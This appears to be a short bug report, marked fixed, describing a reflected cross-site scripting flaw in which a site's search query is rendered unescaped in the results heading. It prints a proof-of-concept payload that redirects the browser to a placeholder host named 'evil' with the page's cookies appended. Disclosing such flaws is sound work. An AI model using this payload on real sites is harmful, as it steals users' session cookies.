XSS vulnerability through search form.
The search query is sent as a GET parameter and is not escaped when rendered back in various places on the page, including the heading shown below, this allows code to be rendered directly from a malicious URL.
<h1> <span class="localizedTextKey" data-key="WeCouldNotFindAnyResultsFor"> We could not find any results for </span> "<script>location.href="evil?"+document.cookie</script>" </h1>
Reported Fixed
Back